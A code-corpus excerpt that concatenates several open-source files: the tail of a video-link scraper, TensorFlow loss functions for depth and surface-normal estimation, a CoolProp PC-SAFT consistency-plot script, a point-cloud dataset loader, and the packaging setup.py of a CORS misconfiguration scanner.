except: pass
try: sources.append({'source': 'Dizimag', 'quality': 'HD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '720'][0]})
except: pass
try: sources.append({'source': 'Dizimag', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '480'][0]})
except: sources.append({'source': 'Dizimag', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '360'][0]})
except:
pass
try:
url = [i for i in result if 'google' in i[0]]
try: sources.append({'source': 'GVideo', 'quality': '1080p', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '1080'][0]})
except: pass
try: sources.append({'source': 'GVideo', 'quality': 'HD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '720'][0]})
except: pass
try: sources.append({'source': 'GVideo', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '480'][0]})
except: sources.append({'source': 'GVideo', 'quality': 'SD', 'provider': 'Dizimag', 'url': [i[0] for i in url if i[1] == '360'][0]})
except:
pass
return sources
except:
return sources
def resolve(self, url):
try:
if not 'google' in url: return url
if url.startswith('stack://'): return url
url = client.request(url, output='geturl')
if 'requiressl=yes' in url: url = url.replace('http://', 'https://')
else: url = url.replace('https://', 'http://')
return url
except:
return
|
training/training_code/utils/Loss_functions.py | sergeyprokudin/HDNet_TikTok | 257 | 12690395 | <gh_stars>100-1000
import tensorflow as tf
# import tensorflow_graphics as tfg
import numpy as np
import skimage.data
from PIL import Image, ImageDraw, ImageFont
import math
from tensorflow.python.platform import gfile
import scipy.misc
IMAGE_HEIGHT = 256
IMAGE_WIDTH = 256
# *****************************************************************************************************
def calc_loss(output, y, z_r):
# y refine
y_masked = tf.where(z_r, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# output refine
o_masked = tf.where(z_r, output, 0*tf.ones_like(y))
o_masked_flat_refined = tf.reshape(o_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# mask refine
mask_one_refined = tf.where(z_r, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat_refined = tf.reshape(mask_one_refined,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# num of pixels
numOfPix = tf.reduce_sum(mask_one_flat_refined,1)
d = tf.subtract(o_masked_flat_refined, y_masked_flat_refined)
d_sum = tf.reduce_sum(tf.square(d),1)
cost = tf.reduce_mean(tf.truediv(d_sum, numOfPix))
return cost
# *****************************************************************************************************
def calc_loss_normal(output, y_normal,z_refined):
# gives mean angle error for given output tensor and its ref y
output_mask = tf.abs(output) < 1e-5
output_no0 = tf.where(output_mask, 1e-5*tf.ones_like(output), output)
output_mag = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.square(output_no0),3)),-1)
output_unit = tf.divide(output_no0,output_mag)
z_mask = z_refined[...,0]
a11 = tf.boolean_mask(tf.reduce_sum(tf.square(output_unit),3),z_mask)
a22 = tf.boolean_mask(tf.reduce_sum(tf.square(y_normal),3),z_mask)
a12 = tf.boolean_mask(tf.reduce_sum(tf.multiply(output_unit,y_normal),3),z_mask)
cos_angle = a12/tf.sqrt(tf.multiply(a11,a22))
cos_angle_clipped = tf.clip_by_value(tf.where(tf.is_nan(cos_angle),-1*tf.ones_like(cos_angle),cos_angle),-1,1)
# MAE, using tf.acos() is numerically unstable, here use Taylor expansion of "acos" instead
loss = tf.reduce_mean(3.1415926/2-cos_angle_clipped-tf.pow(cos_angle_clipped,3)/6-tf.pow(cos_angle_clipped,5)*3/40-tf.pow(cos_angle_clipped,7)*5/112-tf.pow(cos_angle_clipped,9)*35/1152)
return loss
def calc_loss_normal2(output, y_normal,z_refined):
# gives mean angle error for given output tensor and its ref y
output_mask = tf.abs(output) < 1e-5
output_no0 = tf.where(output_mask, 1e-5*tf.ones_like(output), output)
output_mag = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.square(output_no0),3)),-1)
output_unit = tf.divide(output_no0,output_mag)
z_mask = z_refined[...,0]
a11 = tf.boolean_mask(tf.reduce_sum(tf.square(output_unit),3),z_mask)
a22 = tf.boolean_mask(tf.reduce_sum(tf.square(y_normal),3),z_mask)
a12 = tf.boolean_mask(tf.reduce_sum(tf.multiply(output_unit,y_normal),3),z_mask)
cos_angle = a12/(a11+0.00001)
loss = tf.reduce_mean(tf.acos(cos_angle))
return loss
# *****************************************************************************************************
def calc_loss_d_refined_mask(output, y, z_refined):
multiply = tf.constant([IMAGE_HEIGHT*IMAGE_WIDTH])
# mask nonrefine
mask_one = tf.where(z_refined, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat = tf.reshape(mask_one,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# y refine
y_masked = tf.where(z_refined, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
max_y = tf.reduce_max(y_masked_flat_refined,1)
matrix_max_y = tf.transpose(tf.reshape(tf.tile(max_y, multiply), [ multiply[0], tf.shape(max_y)[0]]))
# normalize depth
output_flat = tf.reshape(output,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
output_flat_masked = tf.multiply(output_flat, mask_one_flat)
output_max = tf.reduce_max(output_flat_masked,1)
matrix_max = tf.transpose(tf.reshape(tf.tile(output_max, multiply), [ multiply[0], tf.shape(output_max)[0]]))
output_min = tf.reduce_min(output_flat_masked,1)
matrix_min = tf.transpose(tf.reshape(tf.tile(output_min, multiply), [ multiply[0], tf.shape(output_min)[0]]))
output_unit_flat = tf.truediv(tf.subtract(output_flat_masked,matrix_min),tf.subtract(matrix_max,matrix_min))
output_unit_flat = tf.multiply(output_unit_flat,matrix_max_y)
# mask refine
mask_one_refined = tf.where(z_refined, tf.ones_like(y), 0*tf.ones_like(y))
mask_one_flat_refined = tf.reshape(mask_one_refined,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
# output refine
output_unit_masked_flat_refined = tf.multiply(output_unit_flat, mask_one_flat_refined)
# y refine
y_masked = tf.where(z_refined, y, 0*tf.ones_like(y))
y_masked_flat_refined = tf.reshape(y_masked,[-1, IMAGE_HEIGHT*IMAGE_WIDTH])
numOfPix = tf.reduce_sum(mask_one_flat_refined,1)
d = tf.subtract(output_unit_masked_flat_refined, y_masked_flat_refined)
a1 = tf.reduce_sum(tf.square(d),1)
a2 = tf.square(tf.reduce_sum(d,1))
cost = tf.reduce_mean(tf.truediv(a1, numOfPix) - (0.5 * tf.truediv(a2, tf.square(numOfPix))))
return cost
|
wrappers/Python/CoolProp/Plots/ConsistencyPlots_pcsaft.py | pauliacomi/CoolProp | 520 | 12690404 | <reponame>pauliacomi/CoolProp<gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import matplotlib.pyplot as plt
import numpy as np
import time, timeit
import six
import pandas
import CoolProp as CP
from math import ceil
CP.CoolProp.set_debug_level(00)
from matplotlib.backends.backend_pdf import PdfPages
# all_solvers = ['PT', 'DmolarT', 'HmolarP', 'PSmolar', 'SmolarT', 'DmolarP', 'DmolarHmolar', 'DmolarSmolar', 'HmolarSmolar', 'HmolarT']
# not_implemented_solvers = ['HmolarP', 'PSmolar', 'SmolarT', 'DmolarP', 'DmolarHmolar', 'DmolarSmolar', 'HmolarSmolar', 'HmolarT']
all_solvers = ['PT', 'DmolarT']
not_implemented_solvers = []
no_two_phase_solvers = ['PT']
implemented_solvers = [pair for pair in all_solvers if pair not in not_implemented_solvers]
param_labels = dict(Hmolar='Enthalpy [J/mol]/1000',
Smolar='Entropy [J/mol/K]/1000',
Umolar='Int. Ener. [J/mol]/1000',
T='Temperature [K]',
Dmolar='Density [mol/m3]/1000',
P='Pressure [Pa]/1000')
def split_pair(pair):
for key in ['Dmolar', 'Hmolar', 'Smolar', 'P', 'T', 'Umolar']:
if pair.startswith(key):
return key, pair.replace(key, '')
def split_pair_xy(pair):
if pair == 'HmolarP':
return 'Hmolar', 'P'
elif pair == 'PSmolar':
return 'Smolar', 'P'
elif pair == 'PUmolar':
return 'Umolar', 'P'
elif pair == 'PT':
return 'T', 'P'
elif pair == 'DmolarT':
return 'Dmolar', 'T'
elif pair == 'SmolarT':
return 'Smolar', 'T'
elif pair == 'TUmolar':
return 'Umolar', 'T'
elif pair == 'HmolarT':
return 'Hmolar', 'T'
elif pair == 'DmolarP':
return 'Dmolar', 'P'
elif pair == 'DmolarHmolar':
return 'Dmolar', 'Hmolar'
elif pair == 'DmolarSmolar':
return 'Dmolar', 'Smolar'
elif pair == 'DmolarUmolar':
return 'Dmolar', 'Umolar'
elif pair == 'HmolarSmolar':
return 'Smolar', 'Hmolar'
elif pair == 'SmolarUmolar':
return 'Smolar', 'Umolar'
elif pair == 'HmolarUmolar':
return 'Hmolar', 'Umolar'
else:
raise ValueError(pair)
DEBUG_LEVEL = 1
def myprint(level, *args, **kwargs):
if level > DEBUG_LEVEL:
print(*args, **kwargs)
class ConsistencyFigure(object):
def __init__(self, fluid, figsize=(15, 23), backend='PCSAFT', additional_skips=[], mole_fractions=None, p_limits_1phase=None, T_limits_1phase=None, NT_1phase=40, Np_1phase=40, NT_2phase=20, NQ_2phase=20):
self.fluid = fluid
self.backend = backend
self.additional_backend = 'HEOS' # the PCSAFT backend does not currently have all the constants and functions for calculating the boundaries of the phase diagram
print('***********************************************************************************')
print('*************** ' + backend + '::' + fluid + ' ************************')
print('***********************************************************************************')
self.fig, self.axes = plt.subplots(nrows=ceil(len(all_solvers)/2), ncols=2, figsize=figsize)
self.pairs = all_solvers
pairs_generator = iter(self.pairs)
states = [CP.AbstractState(self.additional_backend, fluid) for _ in range(3)]
states_pcsaft = [CP.AbstractState(backend, fluid) for _ in range(3)]
if mole_fractions is not None:
for state in states:
state.set_mole_fractions(mole_fractions)
for state in states_pcsaft:
state.set_mole_fractions(mole_fractions)
self.axes_list = []
if len(self.axes.shape) > 1:
for row in self.axes:
for ax in row:
pair = six.next(pairs_generator)
kwargs = dict(p_limits_1phase=p_limits_1phase, T_limits_1phase=T_limits_1phase, NT_1phase=NT_1phase, Np_1phase=Np_1phase,
NT_2phase=NT_2phase, NQ_2phase=NQ_2phase)
self.axes_list.append(ConsistencyAxis(ax, self, pair, self.fluid, self.backend, self.additional_backend, *states, *states_pcsaft, **kwargs))
ax.set_title(pair)
else:
for ax in self.axes:
pair = six.next(pairs_generator)
kwargs = dict(p_limits_1phase=p_limits_1phase, T_limits_1phase=T_limits_1phase, NT_1phase=NT_1phase, Np_1phase=Np_1phase,
NT_2phase=NT_2phase, NQ_2phase=NQ_2phase)
self.axes_list.append(ConsistencyAxis(ax, self, pair, self.fluid, self.backend, self.additional_backend, *states, *states_pcsaft, **kwargs))
ax.set_title(pair)
self.calc_saturation_curves()
self.plot_saturation_curves()
# self.calc_Tmax_curve()
# self.plot_Tmax_curve()
#
# self.calc_melting_curve()
# self.plot_melting_curve()
self.tight_layout()
self.fig.subplots_adjust(top=0.95)
self.fig.suptitle('Consistency plots for ' + self.fluid, size=14)
errors = []
for i, (ax, pair) in enumerate(zip(self.axes_list, self.pairs)):
if pair not in not_implemented_solvers and pair not in additional_skips:
errors.append(ax.consistency_check_singlephase())
if pair not in no_two_phase_solvers:
ax.consistency_check_twophase()
else:
ax.cross_out_axis()
self.errors = pandas.concat(errors, sort=True)
def calc_saturation_curves(self):
"""
Calculate all the saturation curves in one shot using the state class to save computational time
"""
HEOS = CP.AbstractState(self.additional_backend, self.fluid)
PCSAFT = CP.AbstractState(self.backend, self.fluid)
self.dictL, self.dictV = {}, {}
for Q, dic in zip([0, 1], [self.dictL, self.dictV]):
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
for _T in np.logspace(np.log10(HEOS.keyed_output(CP.iT_triple)), np.log10(HEOS.keyed_output(CP.iT_critical)), 500):
try:
PCSAFT.update(CP.QT_INPUTS, Q, _T)
# print('T', PCSAFT.T())
# print('p', PCSAFT.p())
# print('rhomolar', PCSAFT.rhomolar())
if (PCSAFT.p() < 0): raise ValueError('P is negative:' + str(PCSAFT.p()))
PCSAFT.T(), PCSAFT.p(), PCSAFT.rhomolar()
# PCSAFT.hmolar(), PCSAFT.smolar(), PCSAFT.umolar()
T.append(PCSAFT.T())
p.append(PCSAFT.p())
rhomolar.append(PCSAFT.rhomolar())
# hmolar.append(PCSAFT.hmolar())
# smolar.append(PCSAFT.smolar())
# umolar.append(PCSAFT.umolar())
except ValueError as VE:
myprint(1, 'satT error:', VE, '; T:', '{T:0.16g}'.format(T=_T), 'T/Tc:', _T / HEOS.keyed_output(CP.iT_critical))
dic.update(dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar)))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar)))
# Umolar=np.array(umolar)))
def plot_saturation_curves(self):
for ax in self.axes_list:
ax.label_axes()
ax.plot_saturation_curves()
def calc_Tmax_curve(self):
HEOS = CP.AbstractState(self.additional_backend, self.fluid)
PCSAFT = CP.AbstractState(self.backend, self.fluid)
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
for _p in np.logspace(np.log10(HEOS.keyed_output(CP.iP_min) * 1.01), np.log10(HEOS.keyed_output(CP.iP_max)), 300):
try:
PCSAFT.update(CP.PT_INPUTS, _p, HEOS.keyed_output(CP.iT_max))
except ValueError as VE:
print(1, 'Tmax', _p, VE)
print('T', PCSAFT.T())
print('p', PCSAFT.p())
print('rhomolar', PCSAFT.rhomolar())
myprint(1, 'Tmax', _p, VE)
continue
try:
T.append(PCSAFT.T())
p.append(PCSAFT.p())
rhomolar.append(PCSAFT.rhomolar())
# hmolar.append(PCSAFT.hmolar())
# smolar.append(PCSAFT.smolar())
# umolar.append(PCSAFT.umolar())
except ValueError as VE:
myprint(1, 'Tmax access', VE)
self.Tmax = dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar))
# Umolar=np.array(umolar))
def plot_Tmax_curve(self):
for ax in self.axes_list:
ax.plot_Tmax_curve()
def calc_melting_curve(self):
state = CP.AbstractState('HEOS', self.fluid)
# rhomolar, smolar, hmolar, T, p, umolar = [], [], [], [], [], []
rhomolar, T, p = [], [], []
# Melting line if it has it
if state.has_melting_line():
pmelt_min = max(state.melting_line(CP.iP_min, -1, -1), state.keyed_output(CP.iP_triple)) * 1.01
pmelt_max = min(state.melting_line(CP.iP_max, -1, -1), state.keyed_output(CP.iP_max)) * 0.99
for _p in np.logspace(np.log10(pmelt_min), np.log10(pmelt_max), 100):
try:
Tm = state.melting_line(CP.iT, CP.iP, _p)
state.update(CP.PT_INPUTS, _p, Tm)
T.append(state.T())
p.append(state.p())
rhomolar.append(state.rhomolar())
# hmolar.append(state.hmolar())
# smolar.append(state.smolar())
# umolar.append(state.umolar())
except ValueError as VE:
myprint(1, 'melting', VE)
self.melt = dict(T=np.array(T),
P=np.array(p),
Dmolar=np.array(rhomolar))
# Hmolar=np.array(hmolar),
# Smolar=np.array(smolar))
# Umolar=np.array(umolar))
def plot_melting_curve(self):
for ax in self.axes_list:
ax.plot_melting_curve()
def tight_layout(self):
self.fig.tight_layout()
def add_to_pdf(self, pdf):
""" Add this figure to the pdf instance """
pdf.savefig(self.fig)
def savefig(self, fname, **kwargs):
self.fig.savefig(fname, **kwargs)
class ConsistencyAxis(object):
def __init__(self, axis, fig, pair, fluid, backend, additional_backend, state1, state2, state3,
state4, state5, state6, p_limits_1phase=None, T_limits_1phase=None, NT_1phase=40, Np_1phase=40,
NT_2phase=20, NQ_2phase=20
):
self.ax = axis
self.fig = fig
self.pair = pair
self.fluid = fluid
self.backend = backend
self.additional_backend = additional_backend
self.state = state1
self.state_PT = state2
self.state_QT = state3
self.state_pcsaft = state4
self.state_pcsaft_PT = state5
self.state_pcsaft_QT = state6
self.p_limits_1phase = p_limits_1phase
self.T_limits_1phase = T_limits_1phase
self.NT_1phase = NT_1phase
self.Np_1phase = Np_1phase
self.NQ_2phase = NQ_2phase
self.NT_2phase = NT_2phase
# self.saturation_curves()
def label_axes(self):
""" Label the axes for the given pair """
xparam, yparam = split_pair_xy(self.pair)
self.ax.set_xlabel(param_labels[xparam])
self.ax.set_ylabel(param_labels[yparam])
if xparam in ['P', 'Dmolar']:
self.ax.set_xscale('log')
if yparam in ['P', 'Dmolar']:
self.ax.set_yscale('log')
def plot_saturation_curves(self):
xparam, yparam = split_pair_xy(self.pair)
xL = self.to_axis_units(xparam, self.fig.dictL[xparam])
yL = self.to_axis_units(yparam, self.fig.dictL[yparam])
xV = self.to_axis_units(xparam, self.fig.dictV[xparam])
yV = self.to_axis_units(yparam, self.fig.dictV[yparam])
self.ax.plot(xL, yL, 'k', lw=1)
self.ax.plot(xV, yV, 'k', lw=1)
def plot_Tmax_curve(self):
xparam, yparam = split_pair_xy(self.pair)
x = self.to_axis_units(xparam, self.fig.Tmax[xparam])
y = self.to_axis_units(yparam, self.fig.Tmax[yparam])
self.ax.plot(x, y, 'r', lw=1) # !!! start here: ValueError: x and y must have same first dimension, but have shapes (0,) and (65,)
def plot_melting_curve(self):
xparam, yparam = split_pair_xy(self.pair)
x = self.to_axis_units(xparam, self.fig.melt[xparam])
y = self.to_axis_units(yparam, self.fig.melt[yparam])
self.ax.plot(x, y, 'b', lw=1)
def to_axis_units(self, label, vals):
""" Convert to the units used in the plot """
if label in ['Hmolar', 'Smolar', 'Umolar', 'Dmolar', 'P']:
return vals / 1000
elif label in ['T']:
return vals
else:
raise ValueError(label)
def consistency_check_singlephase(self):
tic = time.time()
# Update the state given the desired set of inputs
param1, param2 = split_pair(self.pair)
key1 = getattr(CP, 'i' + param1)
key2 = getattr(CP, 'i' + param2)
pairkey = getattr(CP, self.pair + '_INPUTS')
# Get the keys and indices and values for the inputs needed
xparam, yparam = split_pair_xy(self.pair)
xkey = getattr(CP, 'i' + xparam)
ykey = getattr(CP, 'i' + yparam)
data = []
if self.p_limits_1phase is not None:
# User-specified limits were provided, use them
p_min, p_max = self.p_limits_1phase
else:
# No user-specified limits were provided, use the defaults
p_min = self.state.keyed_output(CP.iP_min) * 1.01
p_max = self.state.keyed_output(CP.iP_max)
for p in np.logspace(np.log10(p_min), np.log10(p_max), self.Np_1phase):
if self.T_limits_1phase is None:
# No user-specified limits were provided, using the defaults
Tmin = self.state.keyed_output(CP.iT_triple)
if self.state.has_melting_line():
try:
pmelt_min = self.state.melting_line(CP.iP_min, -1, -1)
if p < pmelt_min:
T0 = Tmin
else:
T0 = self.state.melting_line(CP.iT, CP.iP, p)
except Exception as E:
T0 = Tmin + 1.1
data.append(dict(err=str(E), type="melting", input=p))
myprint(1, 'MeltingLine:', E)
else:
T0 = Tmin + 1.1
Tvec = np.linspace(T0, self.state.keyed_output(CP.iT_max), self.NT_1phase)
else:
# Use the provided limits for T
Tvec = np.linspace(self.T_limits_1phase[0], self.T_limits_1phase[1], self.NT_1phase)
for T in Tvec:
try:
# Update the state using PT inputs in order to calculate all the remaining inputs
self.state_pcsaft_PT.update(CP.PT_INPUTS, p, T)
except ValueError as VE:
print(self.state_pcsaft_PT.get_mole_fractions())
print(self.state_PT.get_mole_fractions())
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1="P", val1=p, in2="T", val2=T))
myprint(1, 'consistency', VE)
continue
_exception = False
tic2 = timeit.default_timer()
try:
val1, val2 = self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)
self.state_pcsaft.update(pairkey, val1, val2)
toc2 = timeit.default_timer()
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1=param1, val1=val1, in2=param2, val2=val2))
myprint(1, 'update(1p)', self.pair, 'P', p, 'T', T, 'D', self.state_pcsaft_PT.keyed_output(CP.iDmolar), '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), VE)
_exception = True
x = self.to_axis_units(xparam, self.state_pcsaft_PT.keyed_output(xkey))
y = self.to_axis_units(yparam, self.state_pcsaft_PT.keyed_output(ykey))
if not _exception:
# Check the error on the density
if abs(self.state_pcsaft_PT.rhomolar() / self.state_pcsaft.rhomolar() - 1) < 1e-3 and abs(self.state_pcsaft_PT.p() / self.state_pcsaft.p() - 1) < 1e-3 and abs(self.state_pcsaft_PT.T() - self.state_pcsaft.T()) < 1e-3:
data.append(dict(cls="GOOD", x=x, y=y, elapsed=toc2 - tic2))
if 'REFPROP' not in self.backend:
if self.state_pcsaft_PT.phase() != self.state_pcsaft.phase():
myprint(1, 'bad phase', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), self.state_pcsaft.phase(), 'instead of', self.state_pcsaft_PT.phase())
else:
data.append(dict(cls="INCONSISTENT", type="update", in1=param1, val1=val1, in2=param2, val2=val2, x=x, y=y))
myprint(1, 'bad', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_PT.keyed_output(key1), self.state_pcsaft_PT.keyed_output(key2)), 'T:', self.state_pcsaft_PT.T(), 'Drho:', abs(self.state_pcsaft_PT.rhomolar() / self.state_pcsaft.rhomolar() - 1), abs(self.state_pcsaft_PT.p() / self.state_pcsaft.p() - 1), 'DT:', abs(self.state_pcsaft_PT.T() - self.state_pcsaft.T()))
toc = time.time()
df = pandas.DataFrame(data)
bad = df[df.cls == 'INCONSISTENT']
good = df[df.cls == 'GOOD']
slowgood = good[good.elapsed > 0.01]
excep = df[df.cls == 'EXCEPTION']
badphase = df[df.cls == 'BAD_PHASE']
self.ax.plot(bad.x, bad.y, 'r+', ms=3)
self.ax.plot(good.x, good.y, 'k.', ms=1)
self.ax.plot(excep.x, excep.y, 'rx', ms=3)
self.ax.plot(slowgood.x, slowgood.y, 'b*', ms=6)
self.ax.plot(badphase.x, badphase.y, 'o', ms=3, mfc='none')
print('1-phase took ' + str(toc - tic) + ' s for ' + self.pair)
if self.pair == 'HmolarSmolar':
# plt.plot(good.elapsed)
# plt.title(self.pair)
# plt.show()
good.to_csv('times_water', sep=';')
# good.to_excel('times_water.xlsx') # !!! uncomment
return df[df.cls != 'GOOD']
def consistency_check_twophase(self):
tic = time.time()
state = self.state
try:
if state_pcsaft.fluid_param_string('pure') == 'false':
print("Not a pure-fluid, skipping two-phase evaluation")
return
except:
pass
# Update the state given the desired set of inputs
param1, param2 = split_pair(self.pair)
key1 = getattr(CP, 'i' + param1)
key2 = getattr(CP, 'i' + param2)
pairkey = getattr(CP, self.pair + '_INPUTS')
# Get the keys and indices and values for the inputs needed
xparam, yparam = split_pair_xy(self.pair)
xkey = getattr(CP, 'i' + xparam)
ykey = getattr(CP, 'i' + yparam)
data = []
for q in np.linspace(0, 1, self.NQ_2phase):
Tmin = state.keyed_output(CP.iT_triple) + 1
for T in np.linspace(Tmin, state.keyed_output(CP.iT_critical) - 1, self.NT_2phase):
try:
# Update the state using QT inputs in order to calculate all the remaining inputs
self.state_pcsaft_QT.update(CP.QT_INPUTS, q, T)
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1="Q", val1=q, in2="T", val2=T))
myprint(1, 'consistency', VE)
continue
_exception = False
try:
val1, val2 = self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)
self.state_pcsaft.update(pairkey, val1, val2)
except ValueError as VE:
data.append(dict(err=str(VE), cls="EXCEPTION", type="update", in1=param1, val1=val1, in2=param2, val2=val2))
myprint(1, 'update_QT', T, q)
myprint(1, 'update', param1, self.state_pcsaft_QT.keyed_output(key1), param2, self.state_pcsaft_QT.keyed_output(key2), VE)
_exception = True
x = self.to_axis_units(xparam, self.state_pcsaft_QT.keyed_output(xkey))
y = self.to_axis_units(yparam, self.state_pcsaft_QT.keyed_output(ykey))
if not _exception:
# Check the error on the density
if abs(self.state_pcsaft_QT.rhomolar() / self.state_pcsaft.rhomolar() - 1) < 1e-3 and abs(self.state_pcsaft_QT.p() / self.state_pcsaft.p() - 1) < 1e-3 and abs(self.state_pcsaft_QT.T() - self.state_pcsaft.T()) < 1e-3:
data.append(dict(cls="GOOD", x=x, y=y))
if 'REFPROP' not in self.backend:
if self.state_pcsaft_QT.phase() != self.state_pcsaft.phase():
myprint(1, 'bad phase (2phase)', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)), self.state_pcsaft.phase(), 'instead of', self.state_pcsaft_QT.phase())
else:
myprint(1, 'Q', q)
myprint(1, 'bad(2phase)', self.pair, '{0:18.16g}, {1:18.16g}'.format(self.state_pcsaft_QT.keyed_output(key1), self.state_pcsaft_QT.keyed_output(key2)), 'pnew:', self.state_pcsaft.p(), 'pold:', self.state_pcsaft_QT.p(), 'Tnew:', self.state_pcsaft.T(), 'T:', self.state_pcsaft_QT.T(), 'Drho:', abs(self.state_pcsaft_QT.rhomolar() / self.state_pcsaft.rhomolar() - 1), 'DP', abs(self.state_pcsaft_QT.p() / self.state_pcsaft.p() - 1), 'DT:', abs(self.state_pcsaft_QT.T() - self.state_pcsaft.T()))
data.append(dict(cls="INCONSISTENT", type="update", in1=param1, val1=val1, in2=param2, val2=val2, x=x, y=y))
toc = time.time()
df = pandas.DataFrame(data)
bad = df[df.cls == 'INCONSISTENT']
good = df[df.cls == 'GOOD']
excep = df[df.cls == 'EXCEPTION']
badphase = df[df.cls == 'BAD_PHASE']
self.ax.plot(bad.x, bad.y, 'r+', ms=3)
self.ax.plot(good.x, good.y, 'k.', ms=1)
self.ax.plot(excep.x, excep.y, 'rx', ms=3)
self.ax.plot(badphase.x, badphase.y, 'o', ms=3, mfc='none')
print('2-phase took ' + str(toc - tic) + ' s for ' + self.pair)
def cross_out_axis(self):
xlims = self.ax.get_xlim()
ylims = self.ax.get_ylim()
self.ax.plot([xlims[0], xlims[1]], [ylims[0], ylims[1]], lw=3, c='r')
self.ax.plot([xlims[0], xlims[1]], [ylims[1], ylims[0]], lw=3, c='r')
xparam, yparam = split_pair_xy(self.pair)
x = 0.5 * xlims[0] + 0.5 * xlims[1]
y = 0.5 * ylims[0] + 0.5 * ylims[1]
if xparam in ['P', 'Dmolar']:
x = (xlims[0] * xlims[1])**0.5
if yparam in ['P', 'Dmolar']:
y = (ylims[0] * ylims[1])**0.5
self.ax.text(x, y, 'Not\nImplemented', ha='center', va='center', bbox=dict(fc='white'))
if __name__ == '__main__':
PVT = PdfPages('Consistency.pdf')
CP.CoolProp.set_debug_level(0)
open('timelog.txt', 'w')
with open('timelog.txt', 'a+', buffering=1) as fp:
for fluid in ['METHANOL']: # CP.__fluids__:
tic = timeit.default_timer()
skips = ['DmolarHmolar', 'DmolarSmolar', 'DmolarUmolar', 'HmolarSmolar']
skips = []
ff = ConsistencyFigure(fluid, backend='PCSAFT', additional_skips=skips) # , NT_1phase = 10, Np_1phase = 10, NT_2phase = 100, NQ_2phase = 0)
ff.to_csv('Errors' + fluid, sep=';')
# ff.errors.to_excel('Errors' + fluid + '.xlsx') # !!! uncomment
toc = timeit.default_timer()
print('Time to build:', toc - tic, 'seconds')
ff.add_to_pdf(PVT)
ff.savefig(fluid + '.png')
ff.savefig(fluid + '.pdf')
plt.close()
fp.write('Time to build: {0} seconds for {1}\n'.format(toc - tic, fluid))
del ff
PVT.close()
|
examples/python/datasets/bunny.py | Willyzw/vdbfusion | 119 | 12690414 | <reponame>Willyzw/vdbfusion<gh_stars>100-1000
#!/usr/bin/env python3
import glob
import os
import numpy as np
import open3d as o3d
class BunnyDataset:
"""The bun.conf does not specify how to work with the trasnformation, after hours of tyring to
debug how to use it, I couldn't find how to use the 1996 dataset.
So I've created my own. Contact me if you feel curious on how I've obtianed it.
./mesh_to_dataset.py bunny.ply --scan-count 10
"""
def __init__(self, bunny_root, apply_pose: bool = True):
# Cache
self.use_cache = True
self.apply_pose = apply_pose
self.data_dir = os.path.join(bunny_root, "generated")
self.scan_dir = os.path.join(self.data_dir, "data/")
self.poses = self.load_bunny_poses()
self.scans = self.load_bunny_clouds()
assert len(self.scans) == len(self.poses)
def load_bunny_poses(self):
filename = os.path.join(self.data_dir, "poses.txt")
poses = np.loadtxt(filename).reshape(-1, 4, 4)
return poses
def load_bunny_clouds(self):
scans = []
scan_files = sorted(glob.glob(self.scan_dir + "*.ply"))
for scan_file in scan_files:
scan = o3d.io.read_point_cloud(scan_file)
scans.append(np.asarray(scan.points))
return scans
def __getitem__(self, idx):
return self.scans[idx], self.poses[idx]
def __len__(self):
return len(self.scans)
|
setup.py | bbhunter/CORScanner | 767 | 12690436 | <filename>setup.py<gh_stars>100-1000
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='cors',
version='1.0.1',
description='Fast CORS misconfiguration vulnerabilities scanner',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='<NAME>',
author_email= '<EMAIL>',
url='http://github.com/chenjj/CORScanner',
project_urls={
'Bug Reports': 'https://github.com/chenjj/CORScanner/issues',
'Source': 'https://github.com/chenjj/CORScanner/',
},
license='MIT',
packages=find_packages(),
install_requires=['colorama', 'requests', 'argparse', 'gevent', 'tldextract', 'future', 'PySocks'],
include_package_data=True,
zip_safe=False,
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Environment :: Console',
'Topic :: Security',
],
entry_points={
'console_scripts': [
'cors = CORScanner.cors_scan:main',
],
},
)
|
